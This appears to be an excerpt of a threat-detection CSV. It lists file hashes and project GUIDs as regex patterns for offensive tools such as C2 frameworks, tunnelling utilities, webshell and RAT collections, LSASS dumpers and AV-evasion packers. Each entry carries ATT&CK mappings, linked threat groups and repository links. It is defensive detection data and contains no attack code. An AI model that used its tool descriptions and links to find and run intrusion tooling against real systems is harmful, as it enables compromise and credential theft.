"*4045eef04cb934ac996942d0d51e80420b2ba985*",".{0,1000}4045eef04cb934ac996942d0d51e80420b2ba985.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","25319"
"*404b35cd0c4124111995599f346050da72845a04fe5dacd53d8088692e4a3816*",".{0,1000}404b35cd0c4124111995599f346050da72845a04fe5dacd53d8088692e4a3816.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25320"
"*404cf0d13d243deeeb2b94b9bf807164376a916377e537604a576e6036f84e9d*",".{0,1000}404cf0d13d243deeeb2b94b9bf807164376a916377e537604a576e6036f84e9d.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","25321"
"*4059185741fed75ca2f3551cbcc522265ed3c63f15da6b12301a21668ff7c33d*",".{0,1000}4059185741fed75ca2f3551cbcc522265ed3c63f15da6b12301a21668ff7c33d.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","25323"
"*405cd1547ee19c39e0afa83ba8ac7a53a4f88c95447df355540d82a5aa74e484*",".{0,1000}405cd1547ee19c39e0afa83ba8ac7a53a4f88c95447df355540d82a5aa74e484.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1555.003 - T1110.003 - T1003 - T1081","TA0006 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/kmahyyg/mremoteng-decrypt","1","0","#filehash","N/A","8","1","83","21","2022-10-29T16:02:26Z","2019-05-11T09:09:49Z","25324"
"*405e9c6f0b2ea355c45a80236dd541ecee957c73194dc3e7948b3ae02c8c70ea*",".{0,1000}405e9c6f0b2ea355c45a80236dd541ecee957c73194dc3e7948b3ae02c8c70ea.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","25325"
"*4070bbd80f416e04985826ef55eb76bef5aedfd6abf344ce25c5e7762e9d5ddc*",".{0,1000}4070bbd80f416e04985826ef55eb76bef5aedfd6abf344ce25c5e7762e9d5ddc.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25327"
"*40779b8832f29dc3cf31a047d08e4da5aeaddfc8893b86b8f3f4e34bbb9cec1a*",".{0,1000}40779b8832f29dc3cf31a047d08e4da5aeaddfc8893b86b8f3f4e34bbb9cec1a.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","25330"
"*40834c0deedabba1254592d89b7b7a3af859f3d4e037226fc81eb771eb0a9406*",".{0,1000}40834c0deedabba1254592d89b7b7a3af859f3d4e037226fc81eb771eb0a9406.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","25331"
"*40853f24896e8e1ba7170a9775b056195567e6bbaeadb14afbb8312f35112583*",".{0,1000}40853f24896e8e1ba7170a9775b056195567e6bbaeadb14afbb8312f35112583.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25333"
"*408a69941c8239608571acf56048f603118e947c614c14f7679f19317d4c977b*",".{0,1000}408a69941c8239608571acf56048f603118e947c614c14f7679f19317d4c977b.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","25336"
"*409284796af4c4aa27849cbd51e721620fe0eaa7e8482207905ac4d79bce680b*",".{0,1000}409284796af4c4aa27849cbd51e721620fe0eaa7e8482207905ac4d79bce680b.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","25338"
"*409faf186d5c7ab9c289f8942614c716baed7107b57003f96d76f717bc197df4*",".{0,1000}409faf186d5c7ab9c289f8942614c716baed7107b57003f96d76f717bc197df4.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","#filehash","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","25339"
"*40a2c9d397f398d5faa631d6c6070174807e39962a22be143e35b7497b5c6bd7*",".{0,1000}40a2c9d397f398d5faa631d6c6070174807e39962a22be143e35b7497b5c6bd7.{0,1000}","offensive_tool_keyword","SharpMiniDump","Create a minidump of the LSASS process from memory","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/b4rtik/SharpMiniDump","1","0","#filehash","N/A","10","3","260","49","2022-11-02T15:47:30Z","2019-09-15T13:45:42Z","25340"
"*40a7ea977e0b28240c6b53f0b5ee130050545aa06cce4ef21afb7f82645cd0cb*",".{0,1000}40a7ea977e0b28240c6b53f0b5ee130050545aa06cce4ef21afb7f82645cd0cb.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","25341"
"*40ab3cf285a8ee70b183bd6f12c2b2fa0890df82ed38ce7833263781cbf37a19*",".{0,1000}40ab3cf285a8ee70b183bd6f12c2b2fa0890df82ed38ce7833263781cbf37a19.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","#filehash","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","25342"
"*40adc45972155c2b27e671de7a26d36e20c9061c9ace85c4939b3eadcb6f7467*",".{0,1000}40adc45972155c2b27e671de7a26d36e20c9061c9ace85c4939b3eadcb6f7467.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","25343"
"*40af7b934df0673c434a4a92effc1928ad6294fc0ebc627718883645f0f42b58*",".{0,1000}40af7b934df0673c434a4a92effc1928ad6294fc0ebc627718883645f0f42b58.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25344"
"*40B05F26-6A2F-40BC-88DE-F40D4BC77FB0*",".{0,1000}40B05F26\-6A2F\-40BC\-88DE\-F40D4BC77FB0.{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tool","https://github.com/florylsk/NtRemoteLoad","1","0","#GUIDproject","N/A","10","3","213","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z","25345"
"*40b10d676e40a4c5c006f2d8b92cd5fa069b83348612d052e626e7792b4edbf7*",".{0,1000}40b10d676e40a4c5c006f2d8b92cd5fa069b83348612d052e626e7792b4edbf7.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","#filehash","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","25347"
"*40b6cb38fbdefd986159c294c15a9d85f477e8f4ff2c5b2beac4c7db5a9b4772*",".{0,1000}40b6cb38fbdefd986159c294c15a9d85f477e8f4ff2c5b2beac4c7db5a9b4772.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","#filehash","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","25348"
"*40b8524cf1b5da1d34f75b27ab5c931cc576e8bd1bf78ea587e4b652d843ad89*",".{0,1000}40b8524cf1b5da1d34f75b27ab5c931cc576e8bd1bf78ea587e4b652d843ad89.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","25349"
"*40bb9963dfa7bef8169b8746bcb894cd53586c3d2f4316eb6cebb242f49be1ef*",".{0,1000}40bb9963dfa7bef8169b8746bcb894cd53586c3d2f4316eb6cebb242f49be1ef.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","25351"
"*40c04908fd5b240769a49825c02b50430948048234edf25d1b48905add12c275*",".{0,1000}40c04908fd5b240769a49825c02b50430948048234edf25d1b48905add12c275.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","25352"
"*40c48046580b66d7651f993380e92cf3e0931261134626e52e7be96132341e00*",".{0,1000}40c48046580b66d7651f993380e92cf3e0931261134626e52e7be96132341e00.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25354"
"*40C64006-EE9C-4EC8-A378-B8499142C071*",".{0,1000}40C64006\-EE9C\-4EC8\-A378\-B8499142C071.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","25355"
"*40C6A1BB-69AA-4869-81EE-41917D0B009A*",".{0,1000}40C6A1BB\-69AA\-4869\-81EE\-41917D0B009A.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","25356"
"*40ce2ea4f4a90332a6e554ddbd9b801e22df018458127ae6ad1243c7d25a5523*",".{0,1000}40ce2ea4f4a90332a6e554ddbd9b801e22df018458127ae6ad1243c7d25a5523.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","0","#filehash","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","25358"
"*40ce2ea4f4a90332a6e554ddbd9b801e22df018458127ae6ad1243c7d25a5523*",".{0,1000}40ce2ea4f4a90332a6e554ddbd9b801e22df018458127ae6ad1243c7d25a5523.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","25359"
"*40ce820df679b59476f5d277350dca43e3b3f8cac7ec47ad638371aaa646c315*",".{0,1000}40ce820df679b59476f5d277350dca43e3b3f8cac7ec47ad638371aaa646c315.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#filehash","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","25360"
"*40d3e3372bd58101f50a25902a71a41fd1605652fe051b3e90660563a9fbebd3*",".{0,1000}40d3e3372bd58101f50a25902a71a41fd1605652fe051b3e90660563a9fbebd3.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","25362"
"*40d86b833531b7f216caa95443f4eb6f0e5b15764072a5708d62380bac2f8ff4*",".{0,1000}40d86b833531b7f216caa95443f4eb6f0e5b15764072a5708d62380bac2f8ff4.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","25364"
"*40e4a1e4db51c8aecc7f13b8b3329707d0e353607b83e86e776bd4bfc480516e*",".{0,1000}40e4a1e4db51c8aecc7f13b8b3329707d0e353607b83e86e776bd4bfc480516e.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","25368"
"*40E7714F-460D-4CA6-9A5A-FB32C6769BE4*",".{0,1000}40E7714F\-460D\-4CA6\-9A5A\-FB32C6769BE4.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","#GUIDproject","N/A","10","2","102","13","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z","25369"
"*40e7b75207030fb9603977b5b4fb3a8e67f73a243f004cc6eac07114f2ae061a*",".{0,1000}40e7b75207030fb9603977b5b4fb3a8e67f73a243f004cc6eac07114f2ae061a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25370"
"*40e7cf7955a9a2beedf5d284529036b04c65650f81e81776d8c63713e86b9ca2*",".{0,1000}40e7cf7955a9a2beedf5d284529036b04c65650f81e81776d8c63713e86b9ca2.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","25371"
"*40e8b756d0f996d7127ffc76d3fb122dd014455bc6b0c007e6d5d77e5bb6211b*",".{0,1000}40e8b756d0f996d7127ffc76d3fb122dd014455bc6b0c007e6d5d77e5bb6211b.{0,1000}","offensive_tool_keyword","clickjack","automate abuse of clickonce applications","T1210 - T1204 - T1071.001","TA0001 - TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","25372"
"*40ed4b2a45d5609b78ee36ff6779e51e932bfc50363ca6ec7c4f598d44407bdc*",".{0,1000}40ed4b2a45d5609b78ee36ff6779e51e932bfc50363ca6ec7c4f598d44407bdc.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25374"
"*40f072d74c6fa0c3e9974ca3e7ab5fdafa63487c4ace88c0ec7f539d7b79bfec*",".{0,1000}40f072d74c6fa0c3e9974ca3e7ab5fdafa63487c4ace88c0ec7f539d7b79bfec.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25375"
"*40f237f59a3908d8ba89cdef811ea08cda8cfde555335efc5aa595bbbbaa2463*",".{0,1000}40f237f59a3908d8ba89cdef811ea08cda8cfde555335efc5aa595bbbbaa2463.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","25376"
"*40fc9bd6c327b0384488f7935bc7ce65c84b9d5076561605b7743be82840f3b5*",".{0,1000}40fc9bd6c327b0384488f7935bc7ce65c84b9d5076561605b7743be82840f3b5.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","25378"
"*4104657745ea61b6e8ea8e468968e96bb5b266abedd73d93324ce14113edcdd9*",".{0,1000}4104657745ea61b6e8ea8e468968e96bb5b266abedd73d93324ce14113edcdd9.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","25380"
"*410973764272a0d7b03d129471da1fb720dfdc2c9c0b0934b390bb58444b9c50*",".{0,1000}410973764272a0d7b03d129471da1fb720dfdc2c9c0b0934b390bb58444b9c50.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","25382"
"*4109aabda29898f764177befbe6967500dd724e511317a8232a046c91502b38f*",".{0,1000}4109aabda29898f764177befbe6967500dd724e511317a8232a046c91502b38f.{0,1000}","offensive_tool_keyword","Ddexec","A technique to run binaries filelessly and stealthily on Linux by ""overwriting"" the shell's process with another.","T1055.008 - T1106 - T1059.004","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/arget13/DDexec","1","0","#filehash #linux","N/A","9","9","830","88","2025-03-21T17:51:04Z","2022-01-27T12:52:10Z","25383"
"*410D25CC-A75E-4B65-8D24-05FA4D8AE0B9*",".{0,1000}410D25CC\-A75E\-4B65\-8D24\-05FA4D8AE0B9.{0,1000}","offensive_tool_keyword","PrivFu","Tool to execute token assigned process","T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","TokenAssignor","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","25384"
"*411305d5a0aac7535dc0b676e880c689f254f270f402ec98e395a322996f75da*",".{0,1000}411305d5a0aac7535dc0b676e880c689f254f270f402ec98e395a322996f75da.{0,1000}","offensive_tool_keyword","mortar","evasion technique to defeat and divert detection and prevention of security products (AV/EDR/XDR)","T1027 - T1562","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","#filehash","N/A","8","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","25386"
"*41150be536a30cd95e14bffabff19ac925a283b03425f69cdb0609e428b2ef3a*",".{0,1000}41150be536a30cd95e14bffabff19ac925a283b03425f69cdb0609e428b2ef3a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","25387"
"*41200aacf9f458f0c7dc10d200937ef343a8625d249557f4132605ccb6dc0fc5*",".{0,1000}41200aacf9f458f0c7dc10d200937ef343a8625d249557f4132605ccb6dc0fc5.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","25392"
"*4125d5d3a70366096d13f69bbc1c54ec0bde74411783246365759cb2e727a8ff*",".{0,1000}4125d5d3a70366096d13f69bbc1c54ec0bde74411783246365759cb2e727a8ff.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","25393"
"*413be3fa27650bb8202b36a93755e57a56faf88d98f38a8c546ac6117c70575e*",".{0,1000}413be3fa27650bb8202b36a93755e57a56faf88d98f38a8c546ac6117c70575e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","25394"
